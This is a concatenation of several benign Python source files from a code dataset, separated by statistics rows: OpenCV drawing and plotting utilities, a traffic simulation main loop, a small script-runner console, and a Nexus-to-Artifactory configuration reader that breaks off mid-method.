def display_posts_view(request):
    """Render the list of all posts."""
    context = {"posts": Post.objects.all()}
    return render(request, "posts/display_posts.html", context)
def detail_post_view(request, slug):
    """Render a single post looked up by its slug.

    Fix: use get_object_or_404 so a missing slug yields HTTP 404 instead of
    an unhandled Post.DoesNotExist (HTTP 500).
    """
    post = get_object_or_404(Post, slug=slug)
    template_name = "posts/detail_post.html"
    context = {
        "post": post
    }
    return render(request, template_name, context)
| 23.837838 | 57 | 0.741497 | 121 | 882 | 5.256198 | 0.338843 | 0.113208 | 0.080189 | 0.127358 | 0.188679 | 0.188679 | 0.128931 | 0 | 0 | 0 | 0 | 0 | 0.141723 | 882 | 36 | 58 | 24.5 | 0.840159 | 0 | 0 | 0.1875 | 0 | 0 | 0.092971 | 0.052154 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.125 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee86c19092798935cd7b241e9fbac234703710d | 14,019 | py | Python | cvpro/Utils.py | Mohak-CODING-HEAVEN/CVPRO | 09a2cb4a428738c9e77f17b71469d55eff5e3699 | [
"MIT"
] | 5 | 2021-07-24T18:20:11.000Z | 2022-03-23T09:58:27.000Z | cvpro/Utils.py | Mohak-CODING-HEAVEN/cvpro | 09a2cb4a428738c9e77f17b71469d55eff5e3699 | [
"MIT"
] | null | null | null | cvpro/Utils.py | Mohak-CODING-HEAVEN/cvpro | 09a2cb4a428738c9e77f17b71469d55eff5e3699 | [
"MIT"
] | null | null | null | """
Utilities - CVPRO
BY: MOHAK BAJAJ
CODING HEAVEN
"""
import math
import time
import logging
import cv2
import numpy as np
import copy
def stackImages(_imgList, cols, scale):
    """
    Stack Images together to display in a single window
    :param _imgList: list of images to stack
    :param cols: the num of img in a row
    :param scale: bigger~1+ ans smaller~1-
    :return: Stacked Image
    """
    images = copy.deepcopy(_imgList)
    # Pad with blank frames so the grid is completely filled.
    total = len(images)
    rows = (total + cols - 1) // cols
    height, width = images[0].shape[0], images[0].shape[1]
    blank = np.zeros((height, width, 3), np.uint8)
    images.extend([blank] * (cols * rows - total))
    # Scale every image and promote grayscale frames to 3-channel BGR.
    for idx in range(cols * rows):
        images[idx] = cv2.resize(images[idx], (0, 0), None, scale, scale)
        if len(images[idx].shape) == 2:
            images[idx] = cv2.cvtColor(images[idx], cv2.COLOR_GRAY2BGR)
    # Assemble the grid row by row, then stack the rows vertically.
    rowImages = []
    for r in range(rows):
        rowImages.append(np.hstack(images[r * cols:(r + 1) * cols]))
    return np.vstack(rowImages)
def cornerRect(img, bbox, l=30, t=5, rt=1,
               colorR=(255, 0, 255), colorC=(0, 255, 0)):
    """
    :param img: Image to draw on.
    :param bbox: Bounding box [x, y, w, h]
    :param l: length of the corner line
    :param t: thickness of the corner line
    :param rt: thickness of the rectangle
    :param colorR: Color of the Rectangle
    :param colorC: Color of the Corners
    :return: annotated image
    """
    x, y, w, h = bbox
    x1, y1 = x + w, y + h
    if rt != 0:
        cv2.rectangle(img, bbox, colorR, rt)
    # Each corner gets a horizontal and a vertical stub of length l.
    corners = (
        ((x, y), (x + l, y), (x, y + l)),        # top left
        ((x1, y), (x1 - l, y), (x1, y + l)),     # top right
        ((x, y1), (x + l, y1), (x, y1 - l)),     # bottom left
        ((x1, y1), (x1 - l, y1), (x1, y1 - l)),  # bottom right
    )
    for origin, h_end, v_end in corners:
        cv2.line(img, origin, h_end, colorC, t)
        cv2.line(img, origin, v_end, colorC, t)
    return img
def findContours(img, imgPre, minArea=1000, sort=True, filter=0, drawCon=True, c=(255, 0, 0)):
    """
    Finds Contours in an image
    :param img: Image on which we want to draw
    :param imgPre: Image on which we want to find contours
    :param minArea: Minimum Area to detect as valid contour
    :param sort: True will sort the contours by area (biggest first)
    :param filter: Filters based on the corner points e.g. 4 = Rectangle or square
    :param drawCon: draw contours boolean
    :param c: BGR color used for the drawn annotations
    :return: annotated image and found contours as
             [{"cnt", "area", "bbox", "center"}, ...]
    """
    conFound = []
    imgContours = img.copy()
    contours, hierarchy = cv2.findContours(
        imgPre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        if area > minArea:
            # Approximate the contour polygon to count its corner points.
            peri = cv2.arcLength(cnt, True)
            approx = cv2.approxPolyDP(cnt, 0.02 * peri, True)
            # print(len(approx))
            if len(approx) == filter or filter == 0:
                if drawCon:
                    cv2.drawContours(imgContours, cnt, -1, c, 3)
                x, y, w, h = cv2.boundingRect(approx)
                cx, cy = x + (w // 2), y + (h // 2)  # bounding-box center
                cv2.rectangle(imgContours, (x, y), (x + w, y + h), c, 2)
                cv2.circle(imgContours, (x + (w // 2),
                                         y + (h // 2)), 5, c, cv2.FILLED)
                conFound.append({"cnt": cnt, "area": area, "bbox": [
                    x, y, w, h], "center": [cx, cy]})
    if sort:
        conFound = sorted(conFound, key=lambda x: x["area"], reverse=True)
    return imgContours, conFound
def overlayPNG(imgBack, imgFront, pos=[0, 0]):
    """Overlay a 4-channel (BGRA) foreground onto a background at pos=[x, y].

    NOTE(review): `pos` is a mutable default argument; it is only read here,
    but callers should not mutate it.
    """
    hf, wf, cf = imgFront.shape
    hb, wb, cb = imgBack.shape
    # The alpha channel of the foreground acts as the blend mask.
    *_, mask = cv2.split(imgFront)
    maskBGRA = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGRA)
    maskBGR = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
    imgRGBA = cv2.bitwise_and(imgFront, maskBGRA)
    imgRGB = cv2.cvtColor(imgRGBA, cv2.COLOR_BGRA2BGR)

    # Place the masked foreground into a full-size black canvas.
    imgMaskFull = np.zeros((hb, wb, cb), np.uint8)
    imgMaskFull[pos[1]:hf + pos[1], pos[0]:wf + pos[0], :] = imgRGB
    # White canvas with an inverted-mask hole where the foreground goes.
    imgMaskFull2 = np.ones((hb, wb, cb), np.uint8) * 255
    maskBGRInv = cv2.bitwise_not(maskBGR)
    imgMaskFull2[pos[1]:hf + pos[1], pos[0]:wf + pos[0], :] = maskBGRInv

    # Punch the hole out of the background, then OR the foreground in.
    imgBack = cv2.bitwise_and(imgBack, imgMaskFull2)
    imgBack = cv2.bitwise_or(imgBack, imgMaskFull)
    return imgBack
def rotateImage(img, angle, scale=1):
    """Rotate img around its center by `angle` degrees, optionally scaling."""
    height, width = img.shape[:2]
    pivot = (width / 2, height / 2)
    matrix = cv2.getRotationMatrix2D(center=pivot, angle=angle, scale=scale)
    return cv2.warpAffine(src=img, M=matrix, dsize=(width, height))
class ColorFinder:
"""
Finds color in an image based on hsv values
Can run as stand alone to find relevant hsv values
"""
def __init__(self, trackBar=False):
self.trackBar = trackBar
if self.trackBar:
self.initTrackbars()
def empty(self, a):
pass
def initTrackbars(self):
"""
To intialize Trackbars . Need to run only once
"""
cv2.namedWindow("TrackBars")
cv2.resizeWindow("TrackBars", 640, 240)
cv2.createTrackbar("Hue Min", "TrackBars", 0, 179, self.empty)
cv2.createTrackbar("Hue Max", "TrackBars", 179, 179, self.empty)
cv2.createTrackbar("Sat Min", "TrackBars", 0, 255, self.empty)
cv2.createTrackbar("Sat Max", "TrackBars", 255, 255, self.empty)
cv2.createTrackbar("Val Min", "TrackBars", 0, 255, self.empty)
cv2.createTrackbar("Val Max", "TrackBars", 255, 255, self.empty)
def getTrackbarValues(self):
"""
Gets the trackbar values in runtime
:return: hsv values from the trackbar window
"""
hmin = cv2.getTrackbarPos("Hue Min", "TrackBars")
smin = cv2.getTrackbarPos("Sat Min", "TrackBars")
vmin = cv2.getTrackbarPos("Val Min", "TrackBars")
hmax = cv2.getTrackbarPos("Hue Max", "TrackBars")
smax = cv2.getTrackbarPos("Sat Max", "TrackBars")
vmax = cv2.getTrackbarPos("Val Max", "TrackBars")
hsvVals = {"hmin": hmin, "smin": smin, "vmin": vmin,
"hmax": hmax, "smax": smax, "vmax": vmax}
print(hsvVals)
return hsvVals
def update(self, img, myColor=None):
"""
:param img: Image in which color needs to be found
:param hsvVals: List of lower and upper hsv range
:return: (mask) bw image with white regions where color is detected
(imgColor) colored image only showing regions detected
"""
imgColor = [],
mask = []
if self.trackBar:
myColor = self.getTrackbarValues()
if isinstance(myColor, str):
myColor = self.getColorHSV(myColor)
if myColor is not None:
imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lower = np.array(
[myColor['hmin'], myColor['smin'], myColor['vmin']])
upper = np.array(
[myColor['hmax'], myColor['smax'], myColor['vmax']])
mask = cv2.inRange(imgHSV, lower, upper)
imgColor = cv2.bitwise_and(img, img, mask=mask)
return imgColor, mask
def getColorHSV(self, myColor):
    """Return preset HSV limits for a named color, or None when unknown."""
    presets = {
        'red': {'hmin': 146, 'smin': 141, 'vmin': 77,
                'hmax': 179, 'smax': 255, 'vmax': 255},
        'green': {'hmin': 44, 'smin': 79, 'vmin': 111,
                  'hmax': 79, 'smax': 255, 'vmax': 255},
        'blue': {'hmin': 103, 'smin': 68, 'vmin': 130,
                 'hmax': 128, 'smax': 255, 'vmax': 255},
    }
    output = presets.get(myColor)
    if output is None:
        logging.warning("Color Not Defined")
        logging.warning("Available colors: red, green, blue ")
    return output
class FPS:
    """
    Helps in finding Frames Per Second and display on an OpenCV Image
    """

    def __init__(self):
        # timestamp of the previous update; used to compute the frame delta
        self.pTime = time.time()

    def update(self, img=None, pos=(20, 50), color=(255, 0, 0), scale=3, thickness=3):
        """
        Update the frame rate.

        :param img: Image to display on, can be left blank if only fps value required
        :param pos: Position of the FPS on the image
        :param color: Color of the FPS Value displayed
        :param scale: Scale of the FPS Value displayed
        :param thickness: Thickness of the FPS Value displayed
        :return: fps, or (fps, img) when an image is supplied; 0 when no
                 time has elapsed since the previous call
        """
        cTime = time.time()
        try:
            fps = 1 / (cTime - self.pTime)
        except ZeroDivisionError:
            # BUGFIX: the original bare `except:` also swallowed errors
            # raised by cv2.putText (returning 0 and hiding the bug); only
            # a zero time delta is an expected failure here.
            return 0
        self.pTime = cTime
        if img is None:
            return fps
        cv2.putText(img, f'FPS: {int(fps)}', pos, cv2.FONT_HERSHEY_PLAIN,
                    scale, color, thickness)
        return fps, img
class LivePlot:
    """
    Live Plotting Graphs
    Can be used for PID tuning, Simple Trigonometric Plots, etc.
    """

    def __init__(self, w=640, h=480, yLimit=[0, 100],
                 interval=0.001, invert=False, char=' '):
        # NOTE(review): yLimit is a mutable default list; it is only read
        # here (np.interp), but sharing one list across instances is a
        # latent risk — consider `yLimit=None` + default inside the body.
        self.yLimit = yLimit          # [min, max] range of plotted values
        self.w = w                    # plot width in pixels
        self.h = h                    # plot height in pixels
        self.invert = invert          # flip the y axis when True
        self.interval = interval      # minimum seconds between redraws
        self.char = char[0]           # single label character, bottom-right
        self.imgPlot = np.zeros((self.h, self.w, 3), np.uint8)
        self.imgPlot[:] = 225, 225, 225
        # the grey fill above is immediately painted over in black
        cv2.rectangle(self.imgPlot, (0, 0),
                      (self.w, self.h),
                      (0, 0, 0), cv2.FILLED)
        self.xP = 0
        self.yP = 0
        self.yList = []               # rolling window of the last 100 y pixels
        self.xList = [x for x in range(0, 100)]
        self.ptime = 0                # time of the last redraw

    def update(self, y):
        """Append the value `y` and redraw; returns the plot image (BGR)."""
        if time.time() - self.ptime > self.interval:
            # Refresh
            self.imgPlot[:] = 225, 225, 225
            # Draw Static Parts
            self.drawBackground()
            # Draw the text value
            cv2.putText(self.imgPlot, str(y),
                        (self.w - (125), 50), cv2.FONT_HERSHEY_PLAIN,
                        3, (150, 150, 150), 3)
            # map the value into pixel space (optionally inverted axis)
            if self.invert:
                self.yP = int(np.interp(y, self.yLimit,
                                        [self.h, 0]))
            else:
                self.yP = int(np.interp(y, self.yLimit,
                                        [0, self.h]))
            self.yList.append(self.yP)
            if len(self.yList) == 100:
                self.yList.pop(0)
            # connect consecutive samples with line segments
            for i in range(0, len(self.yList)):
                if i < 2:
                    pass
                else:
                    cv2.line(self.imgPlot, (int((self.xList[i - 1] * (self.w // 100))) - (self.w // 10),
                                            self.yList[i - 1]),
                             (int((self.xList[i] * (self.w // 100)) - (self.w // 10)),
                              self.yList[i]), (255, 0, 255), 2)
            self.ptime = time.time()
        return self.imgPlot

    def drawBackground(self):
        """Redraw the static canvas: background, center line, grid, labels."""
        # Draw Background Canvas
        cv2.rectangle(self.imgPlot, (0, 0),
                      (self.w, self.h),
                      (0, 0, 0), cv2.FILLED)
        # Center Line
        cv2.line(self.imgPlot, (0, self.h // 2),
                 (self.w, self.h // 2), (150, 150, 150), 2)
        # Draw Grid Lines
        for x in range(0, self.w, 50):
            cv2.line(self.imgPlot, (x, 0), (x, self.h),
                     (50, 50, 50), 1)
        for y in range(0, self.h, 50):
            cv2.line(self.imgPlot, (0, y), (self.w, y),
                     (50, 50, 50), 1)
            # Y Label (one per horizontal grid line)
            cv2.putText(self.imgPlot, f'{int((self.h - y) * (self.yLimit[1] / self.h))}',
                        (10, y), cv2.FONT_HERSHEY_PLAIN,
                        1, (150, 150, 150), 1)
        # label character in the bottom-right corner
        cv2.putText(self.imgPlot, self.char,
                    (self.w - 100, self.h - 25), cv2.FONT_HERSHEY_PLAIN,
                    5, (150, 150, 150), 5)
def putTextRect(img, text, pos, scale=3, thickness=3, colorT=(255, 255, 255),
                colorR=(255, 0, 255), font=cv2.FONT_HERSHEY_PLAIN,
                offset=10, border=None, colorB=(0, 255, 0)):
    """
    Draw text on top of a filled rectangle background.

    :param img: Image to put text rect on
    :param text: Text inside the rect
    :param pos: Starting position of the rect x1,y1
    :param scale: Scale of the text
    :param thickness: Thickness of the text
    :param colorT: Color of the Text
    :param colorR: Color of the Rectangle
    :param font: Font used. Must be cv2.FONT....
    :param offset: Clearance around the text
    :param border: Outline around the rect
    :param colorB: Color of the outline
    :return: image, rect (x1,y1,x2,y2)
    """
    anchor_x, anchor_y = pos
    (text_w, text_h), _ = cv2.getTextSize(text, font, scale, thickness)
    # rectangle corners with `offset` clearance around the rendered text
    left = anchor_x - offset
    bottom = anchor_y + offset
    right = anchor_x + text_w + offset
    top = anchor_y - text_h - offset
    cv2.rectangle(img, (left, bottom), (right, top), colorR, cv2.FILLED)
    if border is not None:
        cv2.rectangle(img, (left, bottom), (right, top), colorB, border)
    cv2.putText(img, text, (anchor_x, anchor_y), font, scale, colorT, thickness)
    return img, [left, top, right, bottom]
| 35.491139 | 105 | 0.527855 | 1,777 | 14,019 | 4.140687 | 0.211593 | 0.009513 | 0.010873 | 0.017668 | 0.169204 | 0.112395 | 0.0704 | 0.044034 | 0.025007 | 0.018211 | 0 | 0.052809 | 0.343534 | 14,019 | 394 | 106 | 35.581218 | 0.746713 | 0.189029 | 0 | 0.092827 | 0 | 0.004219 | 0.045321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07173 | false | 0.008439 | 0.025316 | 0 | 0.164557 | 0.004219 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eed14fe9df66636359b69e6afcb70db03dc49df | 7,460 | py | Python | main.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | main.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | main.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | import time
import sys
from graphics import GraphApp, GraphWin, Text, Point, _root
from menu import MainMenu
from graphs import Graph, ShortestPaths
from maps import RoadMap
from cars import Car, CarShape, CarFactory
from gps import GPS
from info_window import InfoWindow, RoadInfoWindow
from collision import GridCollisionSystem, QuadTreeCollisionSystem
from latlon import LatLonConverter
from openstreetmap import query_roads_by_lat_lon, save_raw_json_map_data
def main():
    """Set up the map, cars and windows, then run the simulation loop.

    Uses the module-level windows (`window`, `secondary_window`,
    `road_info_window`), `frame` and `main_menu` created in the
    `__main__` block; exits via cleanup() when the time limit is hit.
    """
    window.addToParent()
    window.setBackground('white')
    window.clear()
    window.resetView()
    secondary_window.addToParent()
    secondary_window.setBackground('white')
    secondary_window.clear()
    road_info_window.setBackground('white')
    road_info_window.clear()
    config_data = main_menu.config_data
    map_data = config_data["map_data"]
    # bounding box of the map in lat/lon coordinates
    S = map_data["coords_south"]
    W = map_data["coords_west"]
    N = map_data["coords_north"]
    E = map_data["coords_east"]
    llc = LatLonConverter(window, S, W, N, E)
    graph = Graph()
    graph.load_open_street_map_data(map_data["filename"], llc)
    road_map = RoadMap(graph, window)
    road_map.draw()
    road_map.draw_road_names()
    gps = GPS(graph, road_map)
    cars = []
    car_shapes = []
    car_factory = CarFactory(window, gps, cars, car_shapes)
    num_cars = config_data["num_cars"]
    for _ in range(num_cars):
        car_factory.create()
    # collision_system = GridCollisionSystem(window, cars)
    collision_system = QuadTreeCollisionSystem(window, cars)
    info = InfoWindow(secondary_window)
    info.set_selected_car(cars[0])
    info.initialize_table()
    # the currently selected car is highlighted in yellow
    car_shapes[info.selected_car.index].shape.setFill("yellow")
    road_info = RoadInfoWindow(road_info_window)
    for car_shape in car_shapes:
        car_shape.draw()
    # initialize simulation variables
    simTime = 0.0
    limit = 10000
    TICKS_PER_SECOND = 30
    TIME_PER_TICK = 1.0/TICKS_PER_SECOND
    nextLogicTick = TIME_PER_TICK
    lastFrameTime = time.time()
    lag = 0.0
    # Main Simulation Loop (fixed-timestep logic + free-running render)
    while simTime < limit:
        currentTime = time.time()
        elapsed = currentTime - lastFrameTime
        lastFrameTime = currentTime
        lag += elapsed
        simTime += elapsed
        # process events
        window.update()
        secondary_window.update()
        road_info_window.update()
        frame.update()
        last_pressed_key = (
            window.checkKey() or
            secondary_window.checkKey() or
            road_info_window.checkKey()
        )
        if last_pressed_key is not None:
            if last_pressed_key == "space":
                pause()
                # reset the frame timer so pause time is not simulated
                lastFrameTime = time.time()
            elif last_pressed_key == "p":
                window.zoomIn()
            elif last_pressed_key == "o":
                window.zoomOut()
            elif last_pressed_key == "d":
                print(road_map.get_roads_within_view())
        last_clicked_pt = window.checkMouse()
        if last_clicked_pt is not None:
            # a click selects a car first; otherwise a nearby map object
            car_clicked = False
            map_obj_clicked = False
            for car_shape in car_shapes:
                if car_shape.clicked(last_clicked_pt):
                    car_shapes[info.selected_car.index].shape.setFill("white")
                    info.set_selected_car(cars[car_shape.index])
                    car_shapes[info.selected_car.index].shape.setFill("yellow")
                    car_clicked = True
                    break
            if not car_clicked:
                nearby_object_ids = road_map.get_nearby_object_ids(last_clicked_pt.x, last_clicked_pt.y)
                for map_obj_id in nearby_object_ids:
                    map_obj = road_map.get_obj_by_id(map_obj_id)
                    if map_obj.clicked(last_clicked_pt):
                        # show the road-info popup next to the click
                        relx, rely = window.getRelativeScreenPos(last_clicked_pt.x, last_clicked_pt.y)
                        road_info_window_options = {"place": {"relx": relx, "rely": rely}}
                        road_info_window.addToParent(road_info_window_options)
                        road_info.set_selected_item(map_obj)
                        map_obj_clicked = True
                        break
                if not map_obj_clicked:
                    road_info_window.forget()
        last_clicked_pt = secondary_window.checkMouse()
        if last_clicked_pt is not None:
            secondary_window.update()
            for button in info.buttons:
                button.clicked(last_clicked_pt)
            continue
        # update simulation logic
        while lag > TIME_PER_TICK:
            collision_system.process_collisions(cars)
            for car in cars:
                car.move_towards_dest(TIME_PER_TICK)
                car_shape = car_shapes[car.index]
                car_shape.x = cars[car.index].x
                car_shape.y = cars[car.index].y
            collision_system.update_objects(cars)
            nextLogicTick += TIME_PER_TICK
            lag -= TIME_PER_TICK
        # render updates to window
        for car_shape in car_shapes:
            car_shape.render()
        info.update_table()
        if info.follow_car:
            window.centerScreenOnPoint(info.selected_car.x, info.selected_car.y)
        road_info.update_table()
        road_map.draw_route(info.selected_car, info.show_route)
        _root.update_idletasks()
    cleanup()
def pause():
    """Show a 'Paused' banner and block until space is pressed in any window."""
    cx, cy = window.getCenterScreenPoint()
    banner = Text(Point(cx, cy), 'Paused')
    banner.setSize(24)
    banner.draw(window)
    while True:
        # poll each window in turn, stopping as soon as space is seen
        # (later windows are not polled once a match is found)
        if window.checkKey() == "space":
            break
        if secondary_window.checkKey() == "space":
            break
        if road_info_window.checkKey() == "space":
            break
        window.update()
        secondary_window.update()
        road_info_window.update()
    banner.undraw()
def cleanup():
    """Free resources, close every window and terminate the process."""
    for win in (window, secondary_window, road_info_window):
        win.close()
    frame.close()
    sys.exit()
if __name__ == '__main__':
    # Build the application frame and the three graphics windows:
    # the main map view, the car-info sidebar and the floating
    # road-info popup.
    frame = GraphApp("Traffic Simulation")
    window_options = {"pack": {"side": "left", "fill": "both", "expand": True}}
    window = GraphWin(
        "Map Window", 1280, 800, autoflush=False,
        new_window=False, master=frame.master, master_options=window_options
    )
    secondary_window_options = {"place": {"relx": 1, "rely": 0, "anchor": "ne"}}
    secondary_window = GraphWin(
        "Info Window", 300, 400, autoflush=False, scrollable=False,
        new_window=False, master=frame.master, master_options=secondary_window_options
    )
    road_info_window = GraphWin(
        "Road Info Window", 300, 130, autoflush=False, scrollable=False,
        new_window=False, master=frame.master, master_options={}
    )
    # windows kept hidden until the menu / simulation reveals them
    hidden_windows = [secondary_window, road_info_window]
    main_menu = MainMenu(window, main, hidden_windows=hidden_windows)
    menu_options = {"Menu": main_menu.run, "Restart": main, "Exit": cleanup}
    frame.addMenu(menu_options)
    main()
# TODO
# AI so cars can change lanes without crashing and adjust route based on existing traffic conditions
# add ability for cars to change lanes
# create gui menu so that settings can be changed in the simulation (# of cars, lane closures, etc)
# increase # of cars that can be drawn on the screen at once to: 500 | 1000
# dynamically load additional map data when zooming out or moving camera
| 33.452915 | 104 | 0.640617 | 897 | 7,460 | 5.054627 | 0.274247 | 0.03176 | 0.046317 | 0.013895 | 0.165858 | 0.14689 | 0.142038 | 0.142038 | 0.120644 | 0.032201 | 0 | 0.008081 | 0.270107 | 7,460 | 222 | 105 | 33.603604 | 0.82461 | 0.082842 | 0 | 0.105263 | 0 | 0 | 0.039454 | 0 | 0 | 0 | 0 | 0.004505 | 0 | 1 | 0.017544 | false | 0 | 0.070175 | 0 | 0.087719 | 0.005848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eed7af0e7e14fb232a58b34bca05351e370155d | 1,050 | py | Python | lambda-encoding/lambda_codec/__main__.py | aroberge/import-experiments | 3ceeab9f2443a259f0a1cbd3cd8e09bff7856178 | [
"MIT"
] | null | null | null | lambda-encoding/lambda_codec/__main__.py | aroberge/import-experiments | 3ceeab9f2443a259f0a1cbd3cd8e09bff7856178 | [
"MIT"
] | null | null | null | lambda-encoding/lambda_codec/__main__.py | aroberge/import-experiments | 3ceeab9f2443a259f0a1cbd3cd8e09bff7856178 | [
"MIT"
] | null | null | null | """
main.py
----------
"""
import argparse
import os
import runpy
import sys
from . import console
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Description",
)
parser.add_argument(
"source",
nargs="?",
help="""Name of the script to be run as though it was the main module
run by Python, so that __name__ does equal '__main__'.
""",
)
def main():
    """Run the optional source script, then drop into the custom console
    when Python was started in interactive mode (-i)."""
    console_dict = {"exit": lambda: os._exit(1)}  # force clean exit from console
    args = parser.parse_args()
    if args.source is None:
        # no script given: just open the console
        console.start_console(local_vars=console_dict)
        return
    if not sys.flags.interactive:
        # plain execution: run the file as __main__ and exit
        runpy.run_path(args.source, run_name="__main__")
        return
    # interactive mode: run as a module so its globals can be handed
    # over to the console afterwards
    source = args.source
    if source.endswith(".py"):
        source = source[:-3]
    module_dict = runpy.run_module(source, run_name="__main__")
    console_dict.update(module_dict)
    console.start_console(local_vars=console_dict)
main()
| 22.826087 | 81 | 0.639048 | 128 | 1,050 | 4.976563 | 0.476563 | 0.069074 | 0.047096 | 0.053375 | 0.122449 | 0.122449 | 0.122449 | 0 | 0 | 0 | 0 | 0.002528 | 0.246667 | 1,050 | 45 | 82 | 23.333333 | 0.802781 | 0.046667 | 0 | 0.125 | 0 | 0 | 0.167508 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.15625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eef37709e19ecce787c089fc77ca3d1055e5516 | 5,167 | py | Python | nex2art/core/Nexus.py | IntershopCommunicationsAG/nexus2artifactory | 233bad5e9a0992c64892f16202b1e61df12852d9 | [
"Apache-2.0"
] | null | null | null | nex2art/core/Nexus.py | IntershopCommunicationsAG/nexus2artifactory | 233bad5e9a0992c64892f16202b1e61df12852d9 | [
"Apache-2.0"
] | null | null | null | nex2art/core/Nexus.py | IntershopCommunicationsAG/nexus2artifactory | 233bad5e9a0992c64892f16202b1e61df12852d9 | [
"Apache-2.0"
] | null | null | null | import os
import logging
import xml.etree.ElementTree as ET
from . import Security, Ldap
class Nexus:
    """Reads a Nexus 2 instance's on-disk configuration (conf/nexus.xml and
    conf/capabilities.xml) into repository metadata, and delegates security
    and LDAP settings to the Security and Ldap helpers."""

    def __init__(self):
        self.log = logging.getLogger(__name__)
        self.path = None      # absolute path of the Nexus install, once loaded
        self.repos = None     # list of repository dicts, sorted by 'class'
        self.repomap = None   # repository id -> repository dict
        self.dirty = True
        self.ldap = Ldap()
        self.security = Security()

    def refresh(self, path):
        """(Re)load all configuration from the Nexus instance at `path`.

        Returns True on success, or a human-readable error message string
        on failure. Passing None resets the state without loading.
        """
        repos, repomap = [], {}
        self.path = None
        self.repos = None
        self.repomap = None
        self.dirty = True
        self.ldap.initialize()
        self.security.initialize()
        if path == None: return True
        path = os.path.abspath(path)
        caps = self.getYumCapabilities(path)
        config = os.path.join(path, 'conf', 'nexus.xml')
        self.log.info("Reading Nexus config from %s.", config)
        if not os.path.isfile(config):
            self.log.error("Nexus config file does not exist.")
            return "Given path is not a valid Nexus instance."
        try:
            xml = ET.parse(config).getroot()
            self.security.gettargets(xml)
            for repo in xml.find('repositories').findall('repository'):
                repodata = {}
                repodata['id'] = repo.find('id').text
                repodata['desc'] = repo.find('name').text
                typ, layout = self.getPackType(caps, repo)
                repodata['type'] = typ
                repodata['layout'] = layout
                self.getRepoClass(repo, repodata)
                ext = repo.find('externalConfiguration')
                policy = None
                if ext != None: policy = ext.find('repositoryPolicy')
                # MIXED policy repositories serve releases and snapshots
                repodata['release'] = False
                repodata['snapshot'] = False
                if policy != None:
                    repodata['release'] = policy.text in ('RELEASE', 'MIXED')
                    repodata['snapshot'] = policy.text in ('SNAPSHOT', 'MIXED')
                repos.append(repodata)
                repomap[repodata['id']] = repodata
            self.log.info("Successfully read Nexus config.")
        except:
            # any parse error is reported to the caller as a message string
            self.log.exception("Error reading Nexus config:")
            return "Configuration file nexus.xml is not valid."
        repos.sort(key=lambda x: x['class'])
        self.ldap.refresh(path)
        secrtn = self.security.refresh(path)
        if secrtn != True: return secrtn
        self.repos = repos
        self.repomap = repomap
        self.path = path
        return True

    def getRepoClass(self, repo, repodata):
        """Classify the repository as virtual (group), remote (proxy),
        shadow or local, filling `repodata` in place."""
        ext = repo.find('externalConfiguration')
        members, master = None, None
        if ext != None:
            members = ext.find('memberRepositories')
            master = ext.find('masterRepositoryId')
        remote = repo.find('remoteStorage')
        local = repo.find('localStorage')
        if local != None:
            localurl = local.find('url')
            if localurl != None:
                lurl = localurl.text
                # normalize the local storage url to a trailing slash
                if lurl[-1] != '/': lurl += '/'
                repodata['localurl'] = lurl
        if members != None:
            repodata['class'] = 'virtual'
            repodata['repos'] = []
            for child in members.findall('memberRepository'):
                repodata['repos'].append(child.text)
        elif remote != None:
            repodata['class'] = 'remote'
            repodata['remote'] = remote.find('url').text
        elif master != None: repodata['class'] = 'shadow'
        else: repodata['class'] = 'local'

    def getPackType(self, caps, repo):
        """Map a Nexus providerHint to a package type and repository
        layout; repositories with a Yum capability become 'yum'."""
        if repo.find('id').text in caps: return 'yum', 'simple-default'
        rtypes = ['maven1', 'maven2', 'npm', 'nuget', 'gems']
        ltypes = ['bower', 'gradle', 'ivy', 'npm', 'nuget', 'sbt', 'vcs']
        hint = repo.find('providerHint').text
        if hint == None: return 'generic', 'simple-default'
        # strip a trailing -shadow/-hosted/-proxy/-group qualifier
        subs = hint[hint.rfind('-'):]
        if subs in ('-shadow', '-hosted', '-proxy', '-group'):
            hint = hint[:hint.rfind('-')]
        if hint == 'm2-m1': hint = 'maven1'
        elif hint == 'm1-m2': hint = 'maven2'
        elif hint == 'rubygems': hint = 'gems'
        if hint not in rtypes: hint = 'generic'
        layout = 'simple'
        if hint in ltypes: layout = hint
        elif hint == 'maven1': hint, layout = 'maven', 'maven-1'
